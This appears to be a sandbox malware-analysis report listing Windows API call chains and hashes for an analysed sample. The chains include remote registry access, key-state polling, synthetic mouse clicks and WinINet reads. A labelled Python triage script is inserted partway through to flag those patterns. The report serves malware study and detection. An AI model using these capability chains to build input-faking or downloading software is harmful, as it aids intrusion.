• API String ID: 3226157194-0
APIs
• GetCurrentProcessId.KERNEL32 ref: 00B6AE87
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B6AE95
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B6AEC8
• CloseHandle.KERNEL32(?), ref: 00B6B09D
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
APIs
  • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
  • Part of subcall function 00B6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B6C10E,?,?), ref: 00B6D415
  • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D451
  • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4C8
  • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B6C505
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B6C560
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B6C5C3
• RegCloseKey.ADVAPI32(?,?), ref: 00B6C606
• RegCloseKey.ADVAPI32(00000000), ref: 00B6C613
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
APIs
  • Part of subcall function 00B4E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B4D7CD,?), ref: 00B4E714
  • Part of subcall function 00B4E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B4D7CD,?), ref: 00B4E72D
  • Part of subcall function 00B4EAB0: GetFileAttributesW.KERNEL32(?,00B4D840), ref: 00B4EAB1
• lstrcmpiW.KERNEL32(?,?), ref: 00B4ED8A
• MoveFileW.KERNEL32(?,?), ref: 00B4EDC3
• _wcslen.LIBCMT ref: 00B4EF02
• _wcslen.LIBCMT ref: 00B4EF1A
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00B4EF67
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
APIs
• VariantInit.OLEAUT32(?), ref: 00B49534
• VariantClear.OLEAUT32 ref: 00B495A5
• VariantClear.OLEAUT32 ref: 00B49604
• VariantClear.OLEAUT32(?), ref: 00B49677
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B496A2
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B595F3
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00B5961F
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B59677
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B5969C
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B596A4
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 00B6999D
• GetProcAddress.KERNEL32(00000000,?), ref: 00B69A2D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00B69A49
• GetProcAddress.KERNEL32(00000000,?), ref: 00B69A8F
• FreeLibrary.KERNEL32(00000000), ref: 00B69AAF
  • Part of subcall function 00AFF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00B51A02,?,753CE610), ref: 00AFF9F1
  • Part of subcall function 00AFF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00B40354,00000000,00000000,?,?,00B51A02,?,753CE610,?,00B40354), ref: 00AFFA18
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
• String ID:
• API String ID: 666041331-0
                                                                                                                                                                                                                                                                                    • Opcode ID: bf962ce94a5c4c54eeebeaeea42d8e25af02d3c01270b10224713e9a83af8048
                                                                                                                                                                                                                                                                                    • Instruction ID: ca3d42c05da649305edeca6dd25bdd811eec74ef83aa8bc5152b6b2b817af34c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf962ce94a5c4c54eeebeaeea42d8e25af02d3c01270b10224713e9a83af8048
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5516C35604245DFCB01DFA9C5849ADBBF4FF09314B0581A8E80AAB762DB35ED86CF91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00B7766B
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00B77682
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00B776AB
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00B5B5BE,00000000,00000000), ref: 00B776D0
                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00B776FF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7bef6522256d64b7aaf0208b5b5efef617d60e443c52f605286fb681e019bdd3
                                                                                                                                                                                                                                                                                    • Instruction ID: bea4685d8d8a0572acd574a11fa7de81c4d19886b29a55281c8ebabf2e4cf5d7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bef6522256d64b7aaf0208b5b5efef617d60e443c52f605286fb681e019bdd3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0241E735648504AFD729CF2CCC48FA57BE5EB05350F1542A4F82DA72E4CB70EE51D650
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f7af80bc1bf1e53cd45ebca270638c656d480991ff0664ff0f7812891ea52e60
                                                                                                                                                                                                                                                                                    • Instruction ID: 070eb62e023cd4516ea6d22826ef968542b5db788d81c80399074928150bf6dc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7af80bc1bf1e53cd45ebca270638c656d480991ff0664ff0f7812891ea52e60
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B41D172A002009FCB24DF78C881A9EB7E5EF89314F5545E9E615EB391DB31ED51CB80
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00AE19E1
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00AE19FE
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00AE1A23
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00AE1A3D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 0d35880ccd9dcc4650e199c64b63ef3806a67aba52789a4e9ea66f01027af254
                                                                                                                                                                                                                                                                                    • Instruction ID: adf78bd637556be5090c1ab49a1436a4e4864ea0ba42860c318e3bf204590c8c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d35880ccd9dcc4650e199c64b63ef3806a67aba52789a4e9ea66f01027af254
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86417C71A0416ABFDF059F64D884AFEB7B4FF05764F20826AE429A3290C7346E90DB51
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetInputState.USER32 ref: 00B54310
                                                                                                                                                                                                                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00B54367
                                                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00B54390
                                                                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00B5439A
                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B543AB
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID:
• API String ID: 2256411358-0
• Opcode ID: c8eff6c497010df38531658cac83557d9efec05e9c86697e5c00496bd7fc0db3
• Instruction ID: 491a88985d3819a9b0ba6f4f18a3ccc64fa66d178fe289df393765378c4ea04e
• Opcode Fuzzy Hash: c8eff6c497010df38531658cac83557d9efec05e9c86697e5c00496bd7fc0db3
• Instruction Fuzzy Hash: 9A3164705442459FEB358B64D849BB637E8EB1130AF0406F9D8A6871B0EBB494CDCB29
APIs
• GetWindowRect.USER32(?,?), ref: 00B42262
• PostMessageW.USER32(00000001,00000201,00000001), ref: 00B4230E
• Sleep.KERNEL32(00000000,?,?,?), ref: 00B42316
• PostMessageW.USER32(00000001,00000202,00000000), ref: 00B42327
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 00B4232F
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: 58f8bba242804c6460e7563d9f84bf26c3630b51b4d70e56fae32aaf507d7ed8
• Instruction ID: a344a5b81cac608a441ca84b2901e22435a5f55fb06b109a48c3dda5f0e56d85
• Opcode Fuzzy Hash: 58f8bba242804c6460e7563d9f84bf26c3630b51b4d70e56fae32aaf507d7ed8
• Instruction Fuzzy Hash: FB31B171900219EFDB14CFA8CD89ADE3BB5EF04315F504269FA25A72D0C7B09A44EB90
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00B5CC63,00000000), ref: 00B5D97D
• InternetReadFile.WININET(?,00000000,?,?), ref: 00B5D9B4
• GetLastError.KERNEL32(?,00000000,?,?,?,00B5CC63,00000000), ref: 00B5D9F9
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00B5CC63,00000000), ref: 00B5DA0D
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00B5CC63,00000000), ref: 00B5DA37
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 3191363074-0
• Opcode ID: 0d7c852c408259c4f4175536ef4388b63892c5a52f1e17041d22a0d9e2ba1b5e
• Instruction ID: 7da754430b03fa1d88db6d47ffe43fa860a6dc456ac4abfbf3e8720be7d0370d
• Opcode Fuzzy Hash: 0d7c852c408259c4f4175536ef4388b63892c5a52f1e17041d22a0d9e2ba1b5e
• Instruction Fuzzy Hash: 49314A71504205EFDB24DFA5D884BABBBF8EF04352B1045AEE94AE3150DB30AE499B60
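Two of the function records above are worth reading as API chains rather than as isolated calls: the function at 00B42262 posts message 0x0201 (WM_LBUTTONDOWN) and then 0x0202 (WM_LBUTTONUP) to a window with a Sleep in between, which is a synthetic mouse click, and the function at 00B5D97D probes InternetQueryDataAvailable, calls InternetReadFile, checks GetLastError and signals an event, which is a WinINet response-read loop. The script below is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses "APIs" entries in this report's own "Name.Module(args), ref: address" layout, decodes the message argument of PostMessageW/SendMessageW with the documented winuser.h values, and labels functions that match either chain. The sample input is constructed from the entries shown on this page; the label names, the heuristics and the message table are the example's own assumptions, and a match is a triage hint to review in IDA, not a verdict.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: "APIs" entries of three functions from this
# report, in the report's own "Name.Module(args), ref: address" layout.
SAMPLE_REPORT = """\
APIs
• GetWindowRect.USER32(?,?), ref: 00B42262
• PostMessageW.USER32(00000001,00000201,00000001), ref: 00B4230E
• Sleep.KERNEL32(00000000,?,?,?), ref: 00B42316
• PostMessageW.USER32(00000001,00000202,00000000), ref: 00B42327
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 00B4232F
Memory Dump Source
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00B5CC63,00000000), ref: 00B5D97D
• InternetReadFile.WININET(?,00000000,?,?), ref: 00B5D9B4
• GetLastError.KERNEL32(?,00000000,?,?,?,00B5CC63,00000000), ref: 00B5D9F9
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00B5CC63,00000000), ref: 00B5DA0D
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00B5CC63,00000000), ref: 00B5DA37
Memory Dump Source
APIs
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B761E4
• _wcslen.LIBCMT ref: 00B7624E
Memory Dump Source
"""

# Mouse and keyboard message numbers as defined in winuser.h.
WM_NAMES = {
    0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP",
    0x0201: "WM_LBUTTONDOWN", 0x0202: "WM_LBUTTONUP",
    0x0204: "WM_RBUTTONDOWN", 0x0205: "WM_RBUTTONUP",
}

CALL_RE = re.compile(
    r"^•\s*(?P<name>\w+)\.(?P<module>\w+)"   # Name.Module
    r"(?:\((?P<args>[^)]*)\))?"               # optional (arg,arg,...)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"      # , ref: address
)


@dataclass
class Call:
    name: str
    module: str
    args: List[Optional[int]]   # None where the tracer printed "?"
    ref: int


@dataclass
class Function:
    calls: List[Call] = field(default_factory=list)

    @property
    def first_ref(self) -> int:
        return min(c.ref for c in self.calls)


def parse_args(text: Optional[str]) -> List[Optional[int]]:
    if not text:
        return []
    return [None if a == "?" else int(a, 16) for a in text.split(",")]


def parse_report(text: str) -> List[Function]:
    """Each 'APIs' header opens a function record, 'Memory Dump Source' closes it.
    'Part of subcall ...' lines do not match CALL_RE and are skipped."""
    functions: List[Function] = []
    current: Optional[Function] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = Function()
            functions.append(current)
        elif line == "Memory Dump Source":
            current = None
        elif current is not None:
            m = CALL_RE.match(line)
            if m:
                current.calls.append(Call(m["name"], m["module"],
                                          parse_args(m["args"]), int(m["ref"], 16)))
    return functions


def message_of(call: Call) -> Optional[int]:
    """Second argument of Send/PostMessage is the window message number."""
    if call.name in ("SendMessageW", "PostMessageW", "SendMessageA", "PostMessageA") \
            and len(call.args) > 1:
        return call.args[1]
    return None


def is_synthetic_click(fn: Function) -> bool:
    """A button-down message followed later in the function by the matching button-up."""
    msgs = [message_of(c) for c in fn.calls]
    for down, up in ((0x0201, 0x0202), (0x0204, 0x0205)):
        if down in msgs and up in msgs[msgs.index(down) + 1:]:
            return True
    return False


def is_wininet_read_loop(fn: Function) -> bool:
    """InternetReadFile next to a data-available probe or an error check."""
    names = {c.name for c in fn.calls}
    return "InternetReadFile" in names and bool(names & {"InternetQueryDataAvailable", "GetLastError"})


def triage(text: str) -> List[dict]:
    out = []
    for fn in parse_report(text):
        labels = []
        if is_synthetic_click(fn):
            labels.append("synthetic-click")
        if is_wininet_read_loop(fn):
            labels.append("wininet-download")
        decoded = [f"{c.name}({WM_NAMES.get(message_of(c), hex(message_of(c)))})"
                   for c in fn.calls if message_of(c) is not None]
        out.append({"ref": f"{fn.first_ref:08X}", "labels": labels, "messages": decoded})
    return out


if __name__ == "__main__":
    for row in triage(SAMPLE_REPORT):
        print(row)
```

Running it on the constructed sample labels 00B42262 as synthetic-click, 00B5D97D as wininet-download, and leaves the ListView SendMessageW function at 00B761E4 unlabelled with its message shown as raw 0x1053, since only the mouse and keyboard messages are in the table. To run it over a whole report, paste the text of the function-analysis section in place of SAMPLE_REPORT; the parser ignores the Similarity, Memory Dump Source and fuzzy-hash lines.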
APIs
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B761E4
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00B7623C
• _wcslen.LIBCMT ref: 00B7624E
• _wcslen.LIBCMT ref: 00B76259
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00B762B5
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: MessageSend$_wcslen
• String ID:
• API String ID: 763830540-0
• Opcode ID: 35826d46eef3dc3ea77c54ef1437cf5184154cbfaf9e0003e854a77b29dbf92b
• Instruction ID: 357f7d747ea0fef9b6b1c56fa78a63f156b08942409acc0965c8eba378396ff0
• Opcode Fuzzy Hash: 35826d46eef3dc3ea77c54ef1437cf5184154cbfaf9e0003e854a77b29dbf92b
• Instruction Fuzzy Hash: 6C2171759006189ADB219FA4CC84EEE7BF8EF04324F108296FA3DEB181D7B09985CF50
APIs
• IsWindow.USER32(00000000), ref: 00B613AE
• GetForegroundWindow.USER32 ref: 00B613C5
• GetDC.USER32(00000000), ref: 00B61401
• GetPixel.GDI32(00000000,?,00000003), ref: 00B6140D
• ReleaseDC.USER32(00000000,00000003), ref: 00B61445
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: fa65b85987f89e52280ae466060ace2f073d7dcec7f699c9621a4f81c17ddca7
• Instruction ID: 8547b0c729f6be0f9b88c6965782cc4c04c221b9ef06bbafea640629cf31c732
• Opcode Fuzzy Hash: fa65b85987f89e52280ae466060ace2f073d7dcec7f699c9621a4f81c17ddca7
• Instruction Fuzzy Hash: 43219036A00204AFD704EF69CC84A9EB7F5EF48341B0884A9F85AD7752CE70ED44CB90
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00B1D146
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B1D169
